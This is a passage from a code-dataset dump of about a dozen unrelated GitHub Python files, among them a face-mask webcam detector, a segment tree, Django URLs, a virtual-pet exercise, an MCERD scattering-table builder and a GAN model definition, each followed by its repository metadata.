i+=1\n lemmas[lu.span]=re.escape(self.text[span[0]:span[1]+1]+':'+str(i))\n ### step 2: transform our entries by their lemmatized counterparts.\n for lu in self.annotations:\n lu.set_lemma(lemmas[lu.span])\n lu.semantics=dict({( value, lemmas[key] ) for key,value in lu.semantics.items() if type(key)==tuple}.union({( value, key) for key,value in lu.semantics.items() if type(key)!=tuple}))\n lu.syntax=dict({( value, lemmas[key]) for key,value in lu.syntax.items()})\nclass LU():\n \"\"\"\n This class is for an annotated LU\n \"\"\"\n \"\"\"\n Comme attributs, on aura:\n - l'id de la phrase auquel l'unité est associée\n - son id.\n - le lemme\n - son span\n - le frame associé\n - un dict ( semantics ): span: rôle sémantique\n - un dict( syntax ): span: rôle syntaxique\n \"\"\"\n\n \"\"\"\n comme méthodes, on aura:\n - set_lemma()\n -\n \"\"\"\n def __init__(self, lemma=None, span=None, frame=None, lu_id=None, sent_id=None, syntax=None, semantics=None):\n self.id=lu_id\n self.sent_id=sent_id\n self.lemma=lemma\n self.frame = frame\n self.syntax=set()\n self.semantics=set()\n if syntax is not None:\n self.syntax=syntax\n if semantics is not None:\n self.semantics=semantics\n def __repr__(self):\n rep=str(self.lemma)+':'\n for key, value in self.semantics.items():\n rep+=\" \"+str(value)+'->'+str(key)\n return rep\n def get_lemma(self):\n return self.lemma\n def set_lemma(self, lemma):\n self.lemma=lemma\n def add_semantics(self, span, role):\n self.semantics.add((span, role))\n def remove_semantics(self, span=None, role=None):\n if span is not None:\n if span in self.semantics.keys():\n del self.semantics[span]\n if span is None and role is not None:\n testlist=[key for key in self.semantics.keys() if self.semantics[key]==role]\n if testlist !=[]:\n del self.semantics[testlist[0]]\n def add_syntax(self, span, role):\n self.syntax.add((span,role))\n def remove_syntax(self, span=None, role=None):\n if span is not None:\n if span in self.syntax.keys():\n del self.syntax[id]\n if span is None and role is not None:\n testlist=[key for key in self.syntax.keys() if self.syntax[key]==role]\n if testlist !=[]:\n del self.syntax[testlist[0]]\n\n\n\n\n\n\ntest=LU('Ramaquar')\ntest.add_semantics('123', 'popo')\n\ntest.set_lemma('rastaquouère')\n","repo_name":"HubertCorr/Memoire","sub_path":"Objets.py","file_name":"Objets.py","file_ext":"py","file_size_in_byte":10285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11662219964","text":"from lib.modelbuilder import Model\n\nimport numpy as np\nimport argparse\nimport torch\nimport cv2\n\nprint('[INFO] Initiating...')\nprint('[INFO] Loading resources...')\n\n# adds argument parser for the script\narg_parser = argparse.ArgumentParser()\narg_parser.add_argument('-d', '--detector', required=True, help='Path to face detector file') # path to your 'deploy.prototxt.txt' file\narg_parser.add_argument('-r', '--recognition_model', required=True, help='Path to face recognition file') # path to your 'caffemodel.weights' file\narg_parser.add_argument('-m', '--model', required=True, help='Path to the saved model') # path to your saved trained model\nargs = vars(arg_parser.parse_args())\n\nprint('[INFO] Model used for prediction:', args['model'])\nprint('[STATUS] Loading resources completed')\n\n# WARNING: you can change this accordingly. If you want to make changes, make sure you also set the same value in 'extract_dataset.py' and 'train_and_evaluate.py' files\nIMG_SIZE = 64 # resize value\nLABELS = ['without_mask', 'with_mask', 'mask_weared_incorrect'] # dataset labels\nframe_name = 'Webcam Capture'\n\n# save argument parser into variables\nmodel_path = args['model']\nprototxt_file = args['detector']\ncaffemodel_file = args['recognition_model']\n\n# check for CUDA and GPU computation availability\nuse_cuda = torch.cuda.is_available\n# initiate model object\nmodel = Model()\nif use_cuda:\n model = model.cuda() # move model to GPU\n# load the saved model from the training phase\nmodel.load_state_dict(torch.load(model_path))\n\n# prepare video capture with webcam/camera\ncap = cv2.VideoCapture(0)\n# load in the face detection model\nface_model = cv2.dnn.readNetFromCaffe(prototxt_file, caffemodel_file)\n\nprint('[INFO] Looking for camera/webcam...')\n\n# check for webcam/camera availability\nif cap is None or not cap.isOpened():\n print('[ERROR] No camera device is detected!')\nelse:\n print('[INFO] Camera found! Opening...')\n while True:\n # read webcam/camera frames\n ret, frame = cap.read()\n (h,w) = frame.shape[:2]\n # detect any faces found\n face_blob = cv2.dnn.blobFromImage(frame, scalefactor=1.0, size=(300,300), mean=(104.0, 177.0, 123.0), swapRB=False, crop=False)\n face_model.setInput(face_blob)\n detector = face_model.forward()\n\n if len(detector) > 0:\n for i in range(0, detector.shape[2]):\n rect = detector[0,0,i,3:7] * np.array([w,h,w,h]) # for any faces found, prepare a rectangle bounding box\n (start_x, start_y, end_x, end_y) = rect.astype('int') # bounding box position (x and y)\n confidence = detector[0,0,i,2] # prediction confidence\n\n # proceed to the next step if confidence is above the threshold\n if confidence > 0.5:\n face = frame[start_y:end_y, start_x:end_x]\n if face.size == 0:\n continue\n \n resized_face = cv2.resize(face, (IMG_SIZE, IMG_SIZE)) # resize face\n resized_face = np.expand_dims(resized_face, axis=0) # expand dimension from 3D (IMG_SIZE, IMG_SIZE, 3) to 4D (IMG_SIZE, IMG_SIZE, m, c)\n resized_face = np.reshape(resized_face, [1,3,IMG_SIZE,IMG_SIZE]) # reshape dimension to (m, c, IMG_SIZE, IMG_SIZE)\n\n test_feature = torch.Tensor(resized_face) # convert numpy.array to torch.Tensor\n model.eval() # set model to evaluation mode\n if use_cuda:\n test_feature = test_feature.cuda() # move to GPU if available\n \n # predict using the trained model\n output = model(test_feature)\n pred = np.argmax(output.cpu().detach())\n # calculate prediction score using Softmax formula\n e_x = np.exp(output[0].cpu().detach().numpy()) # e^x\n score = np.max(e_x / e_x.sum() * 100) # max(e^x / sum(e^x))\n\n # set prediction text\n text = '{}: {:.2f}%'.format(LABELS[pred], score)\n if pred == 0: # without mask\n cv2.putText(frame, text, (start_x, start_y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,0,255), 2)\n cv2.rectangle(frame, (start_x, start_y), (end_x, end_y), (255,0,255), 2)\n elif pred == 1: # with mask\n cv2.putText(frame, text, (start_x, start_y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,128,0), 2)\n cv2.rectangle(frame, (start_x, start_y), (end_x, end_y), (0,128,0), 2)\n else: # mask weared incorrect\n cv2.putText(frame, text, (start_x, start_y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,0), 2)\n cv2.rectangle(frame, (start_x, start_y), (end_x, end_y), (255,255,0), 2)\n\n cv2.imshow(frame_name, frame)\n\n # terminate program on 'q' keyboard press\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n print('[INFO] Closing program...')\n cap.release()\n cv2.destroyAllWindows()\n","repo_name":"archeltaneka/face-mask-detection","sub_path":"open_and_predict_from_webcam.py","file_name":"open_and_predict_from_webcam.py","file_ext":"py","file_size_in_byte":5144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27737557742","text":"import sys\nipnut = sys.stdin.readline\n\n\ndef init(start, end, cur):\n if start == end:\n tree[cur] = arr[start]\n return tree[cur]\n mid = (start + end) // 2\n tree[cur] = min(init(start, mid, cur * 2), init(mid + 1, end, cur * 2 + 1))\n return tree[cur]\n\n\ndef find(start, end, cur, left, right):\n if left > end or right < start:\n return 1000000001\n\n if left <= start and end <= right:\n return tree[cur]\n\n mid = (start + end) // 2\n return min(find(start, mid, cur * 2, left, right), find(mid + 1, end, cur * 2 + 1, left, right))\n\n\nN, M = map(int, input().split())\n\narr = [int(input()) for _ in range(N)]\ntree = [0] * 4 * N\ninit(0, N - 1, 1)\n\nfor i in range(M):\n a, b = map(int, input().split())\n print(find(0, N - 1, 1, a - 1, b - 1))\n","repo_name":"thisisiron/Algorithm","sub_path":"BOJ/PrefixSum/10868.py","file_name":"10868.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11805454246","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url('^$', views.index),\n url('^travelbuddy$', views.index),\n url('^main$', views.index),\n url('^travels$', views.travels),\n url('^travels/add$', views.addplan),\n url(r'^login$', views.login),\n url(r'^logout$', views.logout),\n url('^travels/destination/(?P\\d+)$', views.destination),\n url('^travels/join/(?P\\d+)$', views.join_trip),\n]","repo_name":"idarrenly/travel","sub_path":"apps/travelbuddy/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31788369421","text":"\"\"\"\nEliezer Silva\nExercício 15\n-------------\nClasse Bichinho Virtual++:\nMelhore o programa do bichinho virtual, permitindo que o usuário especifique quanto de comida ele fornece ao bichinho e\npor quanto tempo ele brinca com o bichinho.\nFaça com que estes valores afetem quão rapidamente os níveis de fome e tédio caem.\n\"\"\"\nimport time\n\n\nclass Bichinho:\n def __init__(self, nome, nascimento):\n self.nascimento = nascimento\n self.nome = nome\n self.valor_idade = 0\n self.idade = 'Bebê'\n self.valor_saude = 5\n self.saude = 'Saudável'\n self.valor_fome = 2\n self.fome = 'Faminto'\n self.valor_humor = 5\n self.humor = 'Feliz'\n\n def alterar_idade(self):\n agora = time.time()\n self.valor_idade = float(f'{(self.nascimento - agora) * (-1):.2f}')\n\n def alterar_saude(self):\n self.valor_saude -= self.valor_idade * 0.01\n self.valor_humor -= self.valor_idade * 0.01\n self.valor_fome -= 0.3\n\n if self.valor_fome < 5:\n self.valor_saude -= 0.02\n else:\n self.valor_saude += 0.5\n\n if self.valor_humor < 5:\n self.valor_saude -= 0.02\n else:\n self.valor_saude += 0.5\n\n def alterar_fome(self, comida):\n self.valor_fome += comida\n menu(self)\n\n def alterar_humor(self, valor):\n self.valor_humor += valor\n\n if self.valor_fome < 5:\n self.valor_humor -= 0.5\n elif self.valor_fome > 5:\n self.valor_humor += 0.5\n\n self.alterar_fome(0)\n\n def retornar_idade(self):\n if self.valor_idade <= 15:\n self.idade = 'Bebê'\n elif self.valor_idade <= 30:\n self.idade = 'Criança'\n elif self.valor_idade <= 45:\n self.idade = 'Adolescente'\n elif self.valor_idade <= 60:\n self.idade = 'Adulto'\n elif self.valor_idade <= 75:\n self.idade = 'Idoso'\n elif self.valor_idade <= 120:\n print(f'{self.nome} está velhinho...\\n')\n else:\n time.sleep(1.2)\n print(f'Chegou a hora de {self.nome} descansar...\\n'\n f'Adeus meu amiguinho!!'\n f':´(')\n quit()\n return print(f'{self.nome} é um {self.idade}')\n\n def retornar_saude(self):\n if self.valor_saude < -10:\n print(f'{self.nome} ficou muito doente e morreu...')\n quit()\n elif self.valor_saude <= 2:\n self.saude = 'Muito Doente'\n elif 2 < self.valor_saude < 5:\n self.saude = 'Doente'\n elif 5 <= self.valor_saude < 8:\n self.saude = 'Saudável'\n else:\n self.saude = 'Muito Saudável'\n return print(f'Saúde: {self.nome} está {self.saude}')\n\n def retornar_fome(self):\n if self.valor_fome < -10:\n print(f'{self.nome} morreu de fome...\\n'\n f'RIP...')\n quit()\n elif 0 <= self.valor_fome <= 2:\n self.fome = 'Muito Faminto'\n elif 2 < self.valor_fome < 5:\n self.fome = 'Faminto'\n elif 5 <= self.valor_fome < 7:\n self.fome = 'Satisfeito'\n elif 7 <= self.valor_fome < 8:\n self.fome = 'Cheio'\n elif 8 <= self.valor_fome <= 10:\n self.fome = 'Muito Cheio'\n elif self.valor_fome > 13:\n print(f'{self.nome} explodiu de tanto comer...\\n'\n f'RIP...')\n quit()\n return print(f'Fome: {self.nome} está {self.fome}')\n\n def retornar_humor(self):\n if self.valor_humor < 2:\n self.humor = 'Muito Triste'\n elif 2 <= self.valor_humor < 5:\n self.humor = 'Triste'\n elif 5 <= self.valor_humor < 7:\n self.humor = 'Feliz'\n elif 7 <= self.valor_humor < 8:\n self.humor = 'Muito Feliz'\n elif self.valor_humor >= 8:\n self.humor = 'Hiper Feliz'\n return print(f'Humor: {self.nome} está {self.humor}')\n\n\ndef menu(bichinho):\n bichinho.retornar_idade()\n bichinho.retornar_saude()\n bichinho.retornar_fome()\n bichinho.retornar_humor()\n\n print()\n\n bichinho.alterar_idade()\n bichinho.alterar_saude()\n\n print('-' * 6 + ' MENU ' + 6 * '-')\n opcao = input('Alimentar [1]\\n'\n 'Brincar [2]\\n'\n 'Não fazer nada [3]\\n'\n 'Sair [0]\\n'\n '>>> Opção: ')\n\n if opcao == '1':\n print(f'{bichinho.nome} está comendo...\\n')\n time.sleep(1)\n bichinho.alterar_fome(1)\n elif opcao == '2':\n print(f'{bichinho.nome} está brincando...\\n')\n time.sleep(1)\n bichinho.alterar_humor(1)\n elif opcao == '3':\n print(f'{bichinho.nome} não está fazendo nada...\\n')\n time.sleep(1)\n bichinho.alterar_humor(-0.2)\n elif opcao == '0':\n print(f'{bichinho.nome} está dizendo adeus...\\n')\n time.sleep(1)\n print('Obrigado por cuidar de mim!!\\n'\n 'Adeus :)')\n quit()\n else:\n menu(bichinho)\n\n\ndef criar_bichinho():\n print('\\nCrie seu Bichinho Virtual')\n nome = input('>>> Dê um nome para o seu bichinho: ')\n nascimento = time.time()\n bichinho = Bichinho(nome, nascimento)\n print('Seu Bichinho nasceu...\\n')\n time.sleep(1.2)\n menu(bichinho)\n\n\ncriar_bichinho()\n","repo_name":"eliezersilva-dev/PythonBrasil-ListaDeExercicios","sub_path":"8 - Exercícios com Classes 16-17/exercicio_15/exercicio15.py","file_name":"exercicio15.py","file_ext":"py","file_size_in_byte":5394,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"19005508247","text":"import numpy as np\r\nfrom math import atan2\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\n\r\nSteps = 1000 #количество кадров\r\n\r\n#размеры пластины\r\nPlateWidth = 3\r\nPlateHeight = 4\r\nPlateDiagonal = ((PlateWidth**2 + PlateHeight**2) ** 0.5) / 2 #делим на два, так как проекция косинуса должна равномерно растянуться в обе стороны\r\n\r\nt = np.linspace(0, 100, Steps)\r\nz = np.linspace(0, 0, Steps)\r\nd = PlateDiagonal * np.cos(t)\r\nphi = 0.5 * t #скорость поворота\r\n\r\n#угол диагонали пластины, по которой катается шарик\r\nalpha = atan2(PlateHeight, PlateWidth)\r\n\r\n#отступ от пола\r\nStandZ = 1\r\n\r\n#нижние углы пластины в полярных координатах, R=PlateWidth/2\r\nAX = PlateWidth / 2 * np.cos(phi)\r\nAY = PlateWidth / 2 * np.sin(phi)\r\nAZ = StandZ\r\n\r\n#углы пластины симметричны относительно (0,0)\r\nBX = -PlateWidth / 2 * np.cos(phi)\r\nBY = -PlateWidth / 2 * np.sin(phi)\r\nBZ = StandZ\r\n\r\n#верхние углы пластины\r\nCX = BX\r\nCY = BY\r\nCZ = BZ + PlateHeight\r\n\r\nDX = AX\r\nDY = AY\r\nDZ = AZ + PlateHeight\r\n\r\nPathWidth = d * np.cos(alpha)\r\n\r\n#выражаем абсолютные координаты через промежуточную СО в центре диагонали\r\npointZ = StandZ + PlateHeight / 2 + d*np.sin(alpha)\r\n#полярные координаты\r\npointX = PathWidth * np.cos(phi)\r\npointY = PathWidth * np.sin(phi)\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(projection='3d')\r\nax.set(xlim=[-8, 8], ylim=[-8, 8], zlim=[0, 8])\r\n\r\npointPlot, = ax.plot(pointX[0], pointY[0], pointZ[0], marker='o', markersize='3') #marker='o' наша точка - это шарик\r\nlineABPLOT, = ax.plot([AX[0], BX[0]], [AY[0], BY[0]], [AZ, BZ], color='black', linewidth='4')\r\nlineCDPLOT, = ax.plot([CX[0], DX[0]], [CY[0], DY[0]], [CZ, DZ], color='black', linewidth='4')\r\nlineADPLOT, = ax.plot([AX[0], DX[0]], [AY[0], DY[0]], [AZ, DZ], color='black', linewidth='4')\r\nlineBCPLOT, = ax.plot([BX[0], CX[0]], [BY[0], CY[0]], [BZ, CZ], color='black', linewidth='4')\r\nlineBDPLOT, = ax.plot([BX[0], DX[0]], [BY[0], DY[0]], [BZ, DZ], color='black', linewidth='4', alpha=0.3)\r\n\r\n#ось вращения\r\naxis = ax.plot([0, 0], [0, 0], [0, 1], color='black', linewidth='2')\r\naxis1 = ax.plot([0, 0], [0, 0], [5, 6], color='black', linewidth='2')\r\naxis2 = ax.plot([-1, 1], [0, 0], [0, 0], color='black', linewidth='2')\r\n\r\ndef Anima(i):\r\n pointPlot.set_data_3d(pointX[i], pointY[i], pointZ[i])\r\n lineABPLOT.set_data_3d([AX[i], BX[i]], [AY[i], BY[i]], [AZ, BZ])\r\n lineCDPLOT.set_data_3d([CX[i], DX[i]], [CY[i], DY[i]], [CZ, DZ])\r\n lineADPLOT.set_data_3d([AX[i], DX[i]], [AY[i], DY[i]], [AZ, DZ])\r\n lineBCPLOT.set_data_3d([BX[i], CX[i]], [BY[i], CY[i]], [BZ, CZ])\r\n lineBDPLOT.set_data_3d([BX[i], DX[i]], [BY[i], DY[i]], [BZ, DZ])\r\n return [pointPlot, lineABPLOT, lineCDPLOT, lineBCPLOT, lineADPLOT, lineBDPLOT]\r\n\r\nanima = FuncAnimation(fig, Anima, frames=Steps, interval=1000/60)\r\nplt.show()\r\n","repo_name":"sonikxx/MAI_Theoretical_Mechanics","sub_path":"lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28143642831","text":"import gym\nimport gym.envs.atari\nimport random\nimport sys\nfrom utils import *\n\n# keeping these global here so we can sample easier \nenv = gym.envs.atari.atari_env.AtariEnv(obs_type='image', frameskip=2)\nstart_state = env.clone_full_state()\nplanner_traces = pickle.load(open(\"datas/planner_traces.p\",\"rb\"))\n\nclass RecordAgent:\n def __init__(self, recorded_actions):\n self.actions = recorded_actions\n self.counter = 0\n\n # takes some observation but doesn't really use them\n def act(self, s, show_prob):\n # obs_prev, obs, prev_a = s\n assert self.counter < len(self.actions), \"ran out of actions!!\"\n ret = self.actions[self.counter]\n self.counter += 1\n return ret\n \ndef sample_planner_sa(n_pairs = 40):\n state, r_best, best_as = random.choice(planner_traces)\n rec_agent = RecordAgent(best_as)\n trace = generate_pong_trace(env, state, rec_agent, do_render=False)\n trs = [random.choice(trace) for i in range(n_pairs)]\n ret = []\n for pz in trs:\n sss, a = pz[0], pz[1]\n if sss[0] is None or sss[1] is None:\n continue\n ret.append((sss,a))\n return ret\n\nif __name__ == \"__main__\":\n while True:\n state, r_best, best_as = random.choice(planner_traces)\n rec_agent = RecordAgent(best_as)\n trr = generate_pong_trace(env, state, rec_agent)\n","repo_name":"evanthebouncy/nnprog","sub_path":"v18_pong_attention1/supervise.py","file_name":"supervise.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"5798315863","text":"# Create the self-regulation method\nself_regulation_method = Method(level=\"Strategy\", name=\"Self-Regulation\")\n\n# Create sub-methods for Self-Regulation\nentrepreneurial_learning = Method(level=\"Tactic\", name=\"Entrepreneurial Learning\")\nchallenge = Method(level=\"Tactic\", name=\"Challenge\")\neduscrum = Method(level=\"Tactic\", name=\"EduScrum\")\n\n# Add the sub-methods to the self-regulation method\nself_regulation_method.add_sub_method(entrepreneurial_learning)\nself_regulation_method.add_sub_method(challenge)\nself_regulation_method.add_sub_method(eduscrum)\n\n# Define sub-methods for Entrepreneurial Learning\nsub_methods_el = [\n Method(level=\"Operational\", name=name) for name in\n [\"Collaboration\", \"Differentiation\", \"Creative Exploration\", \"Active Learning\", \"Open Communication\", \"Observation and Analysis\"]\n]\nfor sub_method in sub_methods_el:\n entrepreneurial_learning.add_sub_method(sub_method)\n\n# Define sub-methods for Challenge\nsub_methods_c = [\n Method(level=\"Operational\", name=name) for name in\n [\"Self-Devised Challenges\", \"Task-Driven Challenges\", \"Adaptive Approach\", \"Challenging Elements\", \"Feedback and Coaching\", \"Intrinsic Motivation\", \"Collaboration\"]\n]\nfor sub_method in sub_methods_c:\n challenge.add_sub_method(sub_method)\n\n# Define sub-methods for EduScrum\nsub_methods_es = [\n Method(level=\"Operational\", name=name) for name in\n [\"Hackathon\", \"Scrum\", \"Own Work\", \"Sprints\"]\n]\nfor sub_method in sub_methods_es:\n eduscrum.add_sub_method(sub_method)\n\n\n\n\n","repo_name":"HeDude/Freell","sub_path":"language/lib/method/Selfregulation.py","file_name":"Selfregulation.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"29442068179","text":"import pytest\nfrom ingestion.wikipedia.scrapers import AirportCodeScraper\n\n\nclass TestAirportCodeScraper:\n @pytest.mark.parametrize(\n \"letter, expected\",\n [\n (\"A\", \"A\"),\n (\"Z\", \"Z\"),\n (\"a\", \"A\"),\n (\"z\", \"Z\"),\n ],\n )\n def test_constructor_ok(self, letter, expected):\n actual = AirportCodeScraper(letter=letter).letter\n assert actual == expected\n\n @pytest.mark.parametrize(\n \"letter\",\n [(\"Aa\"), (\"Test\")],\n )\n def test_constructor_exception_char_count(self, letter):\n with pytest.raises(\n ValueError,\n match=\"parameter 'letter' attribute should be just one character\",\n ):\n scraper = AirportCodeScraper(letter=letter)\n\n @pytest.mark.parametrize(\n \"letter\",\n [\n (\"-\"),\n (\"0\"),\n (\"!\"),\n (\"9\"),\n ],\n )\n def test_constructor_exception_alpha_char(self, letter):\n with pytest.raises(\n ValueError, match=\"parameter 'letter' should be an alphanumeric character\"\n ):\n scraper = AirportCodeScraper(letter=letter)\n\n @pytest.mark.parametrize(\n \"letter, expected\",\n [\n (\n \"A\",\n \"https://en.wikipedia.org/wiki/List_of_airports_by_IATA_airport_code:_A\",\n ),\n (\n \"Z\",\n \"https://en.wikipedia.org/wiki/List_of_airports_by_IATA_airport_code:_Z\",\n ),\n (\n \"a\",\n \"https://en.wikipedia.org/wiki/List_of_airports_by_IATA_airport_code:_A\",\n ),\n (\n \"z\",\n \"https://en.wikipedia.org/wiki/List_of_airports_by_IATA_airport_code:_Z\",\n ),\n ],\n )\n def test_get_endpoint(self, letter, expected):\n actual = AirportCodeScraper(letter=letter)._get_endpoint()\n assert actual == expected\n","repo_name":"gpeixinho/flights-project","sub_path":"tests/ingestion/wikipedia/test_scrapers.py","file_name":"test_scrapers.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"840710431","text":"import math\n\nimport numba as nb\nimport numpy as np\n\nimport numba_mcerd.mcerd.constants as c\nimport numba_mcerd.mcerd.objects as o\nimport numba_mcerd.mcerd.objects_jit as oj\n# import numba_mcerd.mcerd.symbols as s\nfrom numba_mcerd.mcerd import scattering_angle_jit\n\n\ndef scattering_table(g: o.Global, ion: o.Ion, target: o.Target, scat: o.Scattering,\n pot: oj.Potential, natom: int) -> None:\n \"\"\"Create a lookup table for scattering (energies?)\"\"\"\n targetZ = target.ele[natom].Z\n targetA = target.ele[natom].A\n\n scat.a = 0.8854 * c.C_BOHR_RADIUS / (ion.Z ** 0.23 + targetZ ** 0.23)\n scat.E2eps = 4.0 * c.C_PI * c.C_EPSILON0 * scat.a * targetA /\\\n ((ion.A + targetA) * ion.Z * targetZ * c.C_E**2)\n\n emin = math.log(g.emin * scat.E2eps)\n emax = math.log(g.ionemax * scat.E2eps)\n\n ymin = math.log(1.0 / (2.0 * math.exp(emax) * math.tan(0.5 * c.C_PI * c.MAXANGLE / 180.0)))\n ymax = math.log(1.0 / (2.0 * scat.a * target.minN**(1.0/3.0)))\n\n estep = (emax - emin) / (c.EPSNUM - 2)\n ystep = (ymax - ymin) / (c.YNUM - 2)\n\n scat.logemin = emin\n scat.logymin = ymin\n\n scat.logediv = 1.0 / estep\n scat.logydiv = 1.0 / ystep\n\n with g.master.fpout.open(\"a\") as f:\n f.write(f\"a, E2eps {scat.a} {scat.E2eps}\\n\")\n f.write(f\"emin, emax: {emin} {emax}\\n\")\n f.write(f\"ymin, ymax: {ymin} {ymax}\\n\")\n f.write(f\"estep, ystep: {estep} {ystep}\\n\")\n\n scat_matrix = np.array(scat.angle, dtype=np.float64) # Numba seems to do float64 instead of float32\n opt_e, opt_y = main_math(scat_matrix, pot, emin, estep, ymin, ystep)\n scat.angle = scat_matrix\n ion.opt.e = opt_e\n ion.opt.y = opt_y\n\n\n# Can't be parallelized automatically. A manual option would be to split\n# scat_matrix into pieces, and then calculate exp_e and exp_y like so:\n# exp_e = math.exp(emin + (i-1) * estep)\n# exp_y = math.exp(ymin + (j-1) * ystep)\n# scat_matrix[i][0] and scat_matrix[0][j] need to be done separately\n@nb.njit(cache=True, nogil=True)\ndef main_math(scat_matrix, pot, emin, estep, ymin, ystep):\n exp_e = exp_y = 0.0\n\n for i in range(1, scat_matrix.shape[0]):\n exp_e = math.exp(emin)\n scat_matrix[i][0] = exp_e\n y = ymin\n for j in range(1, scat_matrix.shape[1]):\n # print(i, j) # Good for debugging performance\n exp_y = math.exp(y)\n scat_matrix[i][j] = scattering_angle_jit.scattering_angle(pot, exp_e, exp_y)\n y += ystep\n emin += estep\n\n y = ymin\n for j in range(1, scat_matrix.shape[1]):\n scat_matrix[0][j] = math.exp(y)\n y += ystep\n\n return exp_e, exp_y\n\n\n@nb.njit(parallel=True)\ndef main_math_parallelized(scat_matrix, pot, emin, estep, ymin, ystep):\n \"\"\"Can be parallelized, but doesn't offer any speedup. Incomplete, don't use.\"\"\"\n exp_e = exp_y = 0.0\n\n for i in nb.prange(1, scat_matrix.shape[0]):\n # exp_e = math.exp(emin + (i - 1) * estep) # Warning for this\n # scat_matrix[i][0] = exp_e\n for j in nb.prange(1, scat_matrix.shape[1]):\n # exp_y = math.exp(ymin + (j - 1) * ystep) # Warning for this\n scat_matrix[i][j] = scattering_angle_jit.scattering_angle(\n pot,\n math.exp(emin + (i - 1) * estep),\n math.exp(ymin + (j - 1) * ystep))\n\n # for j in numba.prange(1, scat_matrix.shape[1]):\n # y = ymin + (j - 1) * ystep\n # scat_matrix[0][j] = math.exp(y)\n\n return exp_e, exp_y\n","repo_name":"tpitkanen/numba_mcerd","sub_path":"numba_mcerd/mcerd/init_simu_jit.py","file_name":"init_simu_jit.py","file_ext":"py","file_size_in_byte":3493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8584870725","text":"import os\nimport multiprocessing\n# 复制文件夹\ndef copy(q,file_name,old_folder_name,new_floder_name):\n # 打开原文件夹中的文件并读入\n old_f = open(old_folder_name + \"/\" + file_name,\"rb\")\n content = old_f.read()\n old_f.close()\n # 打开新文件夹中的文件并写入\n new_f = open(new_floder_name + \"/\" + file_name,\"wb\")\n new_f.write(content)\n new_f.close()\n # 向队列中添加文件\n q.put(file_name)\ndef main():\n # 获取要复制的文件夹\n old_folder_name = input(\"请输入要复制的文件夹:\")\n # 创建新的文件夹\n new_folder_name = old_folder_name + \"附件\"\n os.mkdir(new_folder_name)\n # 获取原来文件夹中文件的名字\n file_names = os.listdir(old_folder_name)\n print(file_names)\n # 创建进程池\n po = multiprocessing.Pool(5)\n # 创建队列\n q = multiprocessing.Manager().Queue()\n # 向进程池中添加任务\n for file_name in file_names:\n po.apply_async(copy,args=(q,file_name,old_folder_name,new_folder_name))\n po.close()\n # 测试文件夹中文件的个数\n all_num = len(file_names)\n # 已经复制的文件的个数\n copy_num = 0\n while True:\n # 从队列中获取文件\n a = q.get()\n print(a)\n copy_num += 1\n print(\"\\r复制的进度为%.2f %%\"%(copy_num*100/all_num),end=\"\")\n if copy_num >= all_num:\n break\n print()\nif __name__ == '__main__':\n main()","repo_name":"JacksonMike/python_exercise","sub_path":"python练习/网络编程练习/进程/18-copy文件夹显示进度.py","file_name":"18-copy文件夹显示进度.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12804194912","text":"import tensorflow as tf\n\ndef build_generator(SEED_SIZE, image_shape):\n\n filter_constant = 16\n l2reg = tf.keras.regularizers.l2()\n\n height = image_shape[0]\n width = image_shape[1]\n depth = image_shape[-1]\n\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Dense(height*width*depth*filter_constant, input_shape=(SEED_SIZE,)))\n\n model.add(tf.keras.layers.BatchNormalization())\n model.add(tf.keras.layers.LeakyReLU())\n model.add(tf.keras.layers.LeakyReLU())\n\n model.add(tf.keras.layers.Reshape((int(height/2), int(width/2), depth * 4 * filter_constant)))\n print(model.output_shape)\n\n model.add(tf.keras.layers.Conv2DTranspose(depth * filter_constant, (5, 5), strides=(2, 2), padding='same'))\n print(model.output_shape)\n model.add(tf.keras.layers.BatchNormalization())\n model.add(tf.keras.layers.LeakyReLU())\n\n model.add(tf.keras.layers.Conv2DTranspose(depth * int(filter_constant/2), (5, 5), strides=(1, 1), padding='same'))\n print(model.output_shape)\n model.add(tf.keras.layers.BatchNormalization())\n model.add(tf.keras.layers.LeakyReLU())\n\n model.add(tf.keras.layers.Conv2DTranspose(depth, (5, 5), strides=(1, 1), padding='same', activation='tanh'))\n print(model.output_shape)\n\n return model\n\n\ndef build_discriminator(img_shape, depth):\n\n const = ClipConstraint(0.02)\n\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Conv2D(depth*64, (5, 5), strides=(2, 2), padding='same', input_shape=img_shape, kernel_constraint=const))\n model.add(tf.keras.layers.LeakyReLU())\n model.add(tf.keras.layers.Dropout(0.2))\n\n model.add(tf.keras.layers.Conv2D(depth*128, (5, 5), strides=(2, 2), padding='same', kernel_constraint=const))\n model.add(tf.keras.layers.LeakyReLU())\n 